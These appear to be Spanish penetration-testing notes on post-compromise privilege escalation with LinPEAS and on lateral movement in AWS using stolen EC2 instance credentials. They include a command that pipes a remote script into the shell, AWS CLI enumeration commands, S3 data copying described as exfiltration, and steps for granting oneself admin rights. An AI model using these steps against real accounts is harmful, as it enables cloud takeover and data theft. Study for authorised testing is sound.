LinPEAS || Winpeas
PrivEsc id_rsa con permisos inadecuados
Una vez que se ha comprometido una máquina, el siguiente paso en un ataque de red o prueba de penetración es escalar privilegios para obtener más control sobre el sistema y, potencialmente, pivotar hacia otras máquinas dentro de la red. Aquà te dejo un enfoque bien estructurado para estos escenarios:
Herramientas Ăştiles:
LinPEAS: Automatiza la bĂşsqueda de vulnerabilidades de escalaciĂłn de privilegios.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Pivote: investigar
SĂ, lo que se observa en la imagen (credenciales de EC2 Security Credentials) indica que podrĂas aprovechar estas claves para realizar movimientos laterales dentro del entorno de AWS (Amazon Web Services). Estas credenciales te proporcionan acceso potencial a recursos en la nube, dependiendo de los permisos asociados a las claves.
¿Por qué estas credenciales son importantes?
AccessKeyId y SecretAccessKey:
Estas claves permiten autenticarse con la API de AWS.
Pueden ser usadas para interactuar con otros servicios de AWS, como S3, RDS, EC2, entre otros.
Token temporal:
Es parte de un proceso de autenticaciĂłn temporal (STS - Security Token Service).
Se usa junto con las claves para ejecutar comandos o interactuar con la infraestructura AWS.
Permisos asociados:
Las acciones que puedes realizar dependerán de las polĂticas de IAM asociadas a estas credenciales.
Si los permisos son amplios (por ejemplo, AdministratorAccess), podrĂas realizar movimientos laterales, crear nuevos recursos o incluso comprometer toda la cuenta.
¿Qué significa un "movimiento lateral hacia la nube"?
Esto se refiere a usar las credenciales obtenidas en una máquina comprometida (en este caso, una instancia EC2) para interactuar con otros recursos o servicios dentro de la misma cuenta de AWS, o incluso en otras cuentas conectadas. Ejemplos de lo que podrĂas hacer:
EnumeraciĂłn de recursos:
Enumerar usuarios y roles IAM:
bashCopiar cĂłdigoaws iam list-users --access-key YOUR_ACCESS_KEY --secret-key YOUR_SECRET_KEY aws iam list-roles
Listar instancias EC2:
bashCopiar cĂłdigoaws ec2 describe-instances
Listar buckets S3:
bashCopiar cĂłdigoaws s3 ls
ExfiltraciĂłn de datos:
Descargar contenido de un bucket S3.
bashCopiar cĂłdigoaws s3 cp s3://bucket_name/file.txt .
Crear nuevos recursos:
Lanzar nuevas instancias EC2 para propagar control.
Crear usuarios o roles con permisos elevados.
EscalaciĂłn de privilegios:
Si las claves tienen permisos para modificar polĂticas IAM, podrĂas asignarte permisos de administrador.
Pivotar hacia otras cuentas:
Algunas configuraciones de IAM permiten acceso entre cuentas. Usando estas credenciales, podrĂas moverte hacia otros entornos en AWS.
Pasos recomendados tras obtener estas credenciales
Probar las claves con AWS CLI: Configura un perfil con estas credenciales:
bashCopiar cĂłdigoaws configure
Prueba comandos básicos para verificar el nivel de acceso.
Enumerar permisos IAM: Identifica qué acciones puedes realizar:
bashCopiar cĂłdigoaws iam get-user aws iam list-policies-attached-to-user --user-name [user]
Buscar otros recursos crĂticos:
Almacenes de datos.
Máquinas virtuales relacionadas.
Sistemas de logging (CloudTrail).

Last updated